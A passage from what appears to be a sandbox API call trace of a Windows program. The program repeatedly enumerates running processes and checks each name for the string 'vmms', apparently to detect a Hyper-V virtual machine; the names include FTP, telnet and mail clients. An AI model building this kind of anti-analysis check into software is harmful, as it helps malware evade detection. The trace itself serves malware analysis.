WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x357e7a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0101.616] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0101.616] StrStrIA (lpFirst="references compounds.exe", lpSrch="vmms") returned 0x0 [0101.616] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0101.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.617] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f320 [0101.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357f320, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0101.617] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0101.617] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="vmms") returned 0x0 [0101.617] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0101.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.618] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f420 [0101.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357f420, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0101.618] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0101.619] StrStrIA (lpFirst="registered try.exe", lpSrch="vmms") returned 0x0 [0101.619] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0101.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.620] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e500 [0101.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x357e500, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0101.620] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0101.620] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="vmms") returned 0x0 [0101.620] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0101.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.622] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f948 [0101.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x356f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0101.622] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0101.622] StrStrIA (lpFirst="invite.exe", lpSrch="vmms") returned 0x0 [0101.622] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0101.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.623] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fae0 [0101.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x356fae0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0101.623] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0101.623] StrStrIA (lpFirst="idol.exe", lpSrch="vmms") returned 0x0 [0101.623] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0101.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.624] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e730 [0101.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x357e730, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0101.625] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0101.625] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="vmms") returned 0x0 [0101.625] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0101.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0101.626] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x357e7d0 [0101.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x357e7d0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0101.626] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0101.626] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="vmms") returned 0x0 [0101.626] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0101.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.627] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356fab0 [0101.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356fab0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0101.627] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0101.627] StrStrIA (lpFirst="powell_jane.exe", lpSrch="vmms") returned 0x0 [0101.627] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0101.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.629] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f0c0 [0101.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357f0c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0101.629] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0101.629] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="vmms") returned 0x0 [0101.629] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0101.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.630] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356fa20 [0101.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356fa20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0101.630] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0101.630] StrStrIA (lpFirst="gainedshape.exe", lpSrch="vmms") returned 0x0 [0101.630] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0101.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.631] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f160 [0101.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357f160, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0101.632] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0101.632] StrStrIA (lpFirst="opens-versions.exe", lpSrch="vmms") returned 0x0 [0101.632] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0101.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0101.633] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e4b0 [0101.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357e4b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0101.633] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0101.633] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="vmms") returned 0x0 [0101.633] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0101.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.634] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f930 [0101.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356f930, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.634] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0101.634] StrStrIA (lpFirst="3dftp.exe", lpSrch="vmms") returned 0x0 [0101.634] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0101.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.646] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f460 [0101.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357f460, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0101.647] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0101.647] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="vmms") returned 0x0 [0101.647] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0101.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.648] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356fa38 [0101.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356fa38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0101.648] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0101.648] StrStrIA (lpFirst="alftp.exe", lpSrch="vmms") returned 0x0 [0101.648] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0101.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.649] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356faf8 [0101.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356faf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0101.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0101.650] StrStrIA (lpFirst="barca.exe", lpSrch="vmms") returned 0x0 [0101.650] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0101.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.651] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f9c0 [0101.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356f9c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0101.651] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0101.651] StrStrIA (lpFirst="bitkinex.exe", lpSrch="vmms") returned 0x0 [0101.651] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0101.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.653] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fa68 [0101.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356fa68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0101.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0101.653] StrStrIA (lpFirst="coreftp.exe", lpSrch="vmms") returned 0x0 [0101.653] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0101.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.654] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e1e8 [0101.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e1e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0101.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0101.654] StrStrIA (lpFirst="far.exe", lpSrch="vmms") returned 0x0 [0101.654] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0101.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.655] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356fac8 [0101.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356fac8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0101.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0101.656] StrStrIA (lpFirst="filezilla.exe", lpSrch="vmms") returned 0x0 [0101.656] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0101.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.657] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fb88 [0101.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356fb88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0101.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0101.657] StrStrIA (lpFirst="flashfxp.exe", lpSrch="vmms") returned 0x0 [0101.657] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0101.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.658] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356f8d0 [0101.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356f8d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0101.658] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0101.658] StrStrIA (lpFirst="fling.exe", lpSrch="vmms") returned 0x0 [0101.658] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0101.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 